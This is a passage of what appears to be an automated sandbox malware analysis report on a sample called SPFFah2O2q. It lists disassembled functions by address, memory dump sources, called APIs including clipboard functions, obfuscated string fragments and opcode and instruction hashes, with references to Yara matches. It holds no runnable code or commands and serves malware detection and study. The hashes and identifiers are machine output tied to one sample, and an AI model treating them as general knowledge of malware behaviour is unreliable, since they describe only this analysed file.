                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0541097010C7C18AD365DB28849878BBFE16B96314F885A9CE6E94B3E2C7798409C757
                                                                                                                                                                                                                                                                Function 02122670 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 90COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitVariant
                                                                                                                                                                                                                                                                • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                                                                                                                                                                                                                • API String ID: 1927566239-3011065302
                                                                                                                                                                                                                                                                • Opcode ID: 38b59cd13938fe8317dc7d58eddabe9e0085401b214a797582b7f2cd6e6565e9
                                                                                                                                                                                                                                                                • Instruction ID: 7be9f18bdc4b677bb3dfe6a0d102b6056062ccb5de8c9b274149537d7bf1890c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38b59cd13938fe8317dc7d58eddabe9e0085401b214a797582b7f2cd6e6565e9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5741097010C7C18AD365DB28849878FBFE16B96314F885A9CF6E94B3E2C7798409CB53
                                                                                                                                                                                                                                                                Function 00432194 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 83COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitVariant
                                                                                                                                                                                                                                                                • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                                                                                                                                                                                                                • API String ID: 1927566239-3011065302
                                                                                                                                                                                                                                                                • Opcode ID: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
                                                                                                                                                                                                                                                                • Instruction ID: f917ff13e8fa353cdd9af704c32342f25a9e0069aca0bae3d4b305f03d6e9fde
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F841187000D7C18AD3619B28849874FBFE06BA7324F885A9DF6E84B3E2C77984498757
                                                                                                                                                                                                                                                                Function 021223FB Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 83COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitVariant
                                                                                                                                                                                                                                                                • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                                                                                                                                                                                                                • API String ID: 1927566239-3011065302
                                                                                                                                                                                                                                                                • Opcode ID: 1f6040f1df59cba3b40ed0df49f13582157b33a0c7b331a145014ed0c7e5c107
                                                                                                                                                                                                                                                                • Instruction ID: 77ceb1d84627bce9303d8de84d08b1ff63921e337ea2ad5e63cdaa5e56993420
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f6040f1df59cba3b40ed0df49f13582157b33a0c7b331a145014ed0c7e5c107
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76410B7000D7C19AD3659B28849878FBFE06B97314F885A9DF6E84B3E2C7798449C753
                                                                                                                                                                                                                                                                Function 00431EDD Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 92COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                • String ID: A$e$e$n$p$p$v$w$z$z
                                                                                                                                                                                                                                                                • API String ID: 2610073882-1114116150
                                                                                                                                                                                                                                                                • Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                                                                                                                                                                                • Instruction ID: 776134ba1da329d7d35a817d8e2b42585fa70f537528e7a9cdeab4ed979499a7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2641383160C7C18ED331DB38885879BBFD1ABA6324F088AADD4E9872D6D7794505C763
                                                                                                                                                                                                                                                                Function 02122144 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 92COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                • String ID: A$e$e$n$p$p$v$w$z$z
                                                                                                                                                                                                                                                                • API String ID: 2610073882-1114116150
                                                                                                                                                                                                                                                                • Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                                                                                                                                                                                • Instruction ID: 215e1153fe4924e9fee081b507298f35757b0ff449ecb0259ee533e8b1e7a84e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E41383160C7C18ED331CB38885879BBFD1ABA6324F088AADD4E9872D6D7794509C763
                                                                                                                                                                                                                                                                Function 02122C27 Relevance: 9.1, APIs: 6, Instructions: 144clipboardCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1006321803-0
                                                                                                                                                                                                                                                                • Opcode ID: c4fbd4c85c730b82bb0d4d983bd35fb8fa0bc5b81fa1c667f8f1a84b0218d30c
                                                                                                                                                                                                                                                                • Instruction ID: b6d820a8ec019a0753c70d12075308e159192bba8122e011df5bb995b1a22ede
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4fbd4c85c730b82bb0d4d983bd35fb8fa0bc5b81fa1c667f8f1a84b0218d30c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 395124F1D086968FD700AB78C4493AEFFE0AB41310F058639E9A587381D3799868CB93
                                                                                                                                                                                                                                                                Function 0040B390 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                                                • String ID: Wu
                                                                                                                                                                                                                                                                • API String ID: 3664257935-4083010176
                                                                                                                                                                                                                                                                • Opcode ID: 9afe16709b635edc46db45a4dc63f988e76f552cbb384c5dec0475105d426cf8
                                                                                                                                                                                                                                                                • Instruction ID: 023303e962689a797e65a05037f9f777abe5289ef5a5f996be967a955c3fa6a7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9afe16709b635edc46db45a4dc63f988e76f552cbb384c5dec0475105d426cf8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DFC002BA818001AFCE016B61FC198187A23BB563067A809B4F80941536EB624D2BDA1E